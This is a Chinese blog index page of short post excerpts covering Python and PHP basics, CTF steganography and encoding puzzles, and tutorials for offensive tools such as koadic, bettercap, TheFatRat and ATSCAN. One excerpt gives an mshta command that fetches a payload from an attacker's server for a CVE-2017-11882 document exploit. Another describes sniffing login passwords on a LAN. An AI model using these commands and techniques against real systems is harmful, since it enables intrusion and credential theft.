摘要: 在python脚本运行过程中如果出现什么问题,会报错,还会停止脚本的运行。我们可以用异常处理来解决这种问题 运行结果 和没有进行异常处理的运行结果进行比较 脚本运行时要是出错,爆出出错的原因 自定义异常处理 运行结果 当有return返回值时打印返回值的内容 把__str__()函数注释掉,执行 当 阅读全文
posted @ 2017-11-28 20:47 Sch01aR# 阅读(346) 评论(0) 推荐(0) 编辑
摘要: 1.全局变量 可见,在函数中无法直接调用全局变量 test()函数中的变量$a和$b都没有被赋值,进行空值运算,得到结果为0 在函数中使用全局变量可以使用global和$GLOBALS数组 使用global 使用$GLOBALS数组 2.局部变量 函数外不能访问函数内定义的变量,所以函数外进行空值运 阅读全文
posted @ 2017-11-23 22:55 Sch01aR# 阅读(256) 评论(0) 推荐(0) 编辑
摘要: 项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshta http://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[root@sch01ar]─[/sch01ar/ 阅读全文
posted @ 2017-11-21 22:34 Sch01aR# 阅读(559) 评论(0) 推荐(0) 编辑
摘要: 项目地址:https://github.com/zerosum0x0/koadic 下载后打开并安装所需的包 安装完成后启动程序 输入use和空格然后连按两下Tab键查看模块 stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作 选择stager/js/disk 阅读全文
posted @ 2017-11-18 18:04 Sch01aR# 阅读(988) 评论(0) 推荐(0) 编辑
摘要: Spamcarver Spamcarver 用kali下载图片 用binwalk查看是否有隐藏的文件 隐藏着一个zip文件 用foremost分离出文件 在/root/output/的目录下,得到flag 缝缝补补又三年: 下载zip文件,打开 key.txt文件打不开,flag应该就在里面 用c3 阅读全文
posted @ 2017-11-17 23:00 Sch01aR# 阅读(16324) 评论(0) 推荐(0) 编辑
摘要: 使用binwalk检测是否隐藏了文件 还藏了一个zip文件,接下来用foremost来分离文件 分离出来的文件会在/root/output/的目录下 阅读全文
posted @ 2017-11-17 16:40 Sch01aR# 阅读(5227) 评论(0) 推荐(0) 编辑
摘要: 安装bettercap 安装完成后查看一下帮助 开启嗅探 用同一内网的windows2008机访问一个网站,并模拟登陆 嗅探到密码 参数详情: -I:后面加网卡 --use-mac:使用MAC地址替换本机的MAC地址进行攻击 --random-mac:用随机的MAC地址替换本机的MAC地址进行攻击 阅读全文
posted @ 2017-11-12 17:02 Sch01aR# 阅读(1213) 评论(0) 推荐(0) 编辑
摘要: easy! KeyBoard base64全家桶 n次base64 骚年来一发吗 mixed_base64 异性相吸 MD5 easy! KeyBoard base64全家桶 n次base64 骚年来一发吗 mixed_base64 异性相吸 MD5 easy!: 密文:bmN0Znt0aGlzX2 阅读全文
posted @ 2017-11-09 23:09 Sch01aR# 阅读(940) 评论(0) 推荐(0) 编辑
摘要: 项目地址:https://github.com/Screetsec/TheFatRat 安装TheFatRat 安装完成后直接在终端输入fatrat启动 回车 回车 回车 这是菜单界面 这里测试两个功能,首先测试反弹电脑的 选择1,回车 这里有多个文件类型可以选择,我就测试php的,选择5,回车 填 阅读全文
posted @ 2017-11-08 21:14 Sch01aR# 阅读(1779) 评论(0) 推荐(0) 编辑
摘要: 项目地址:https://github.com/AlisamTechnology/ATSCAN 安装的时候一直回车选择默认选项,安装完成后 查看参数 对目标站进行sql注入检测 阅读全文
posted @ 2017-11-06 23:40 Sch01aR# 阅读(455) 评论(0) 推荐(0) 编辑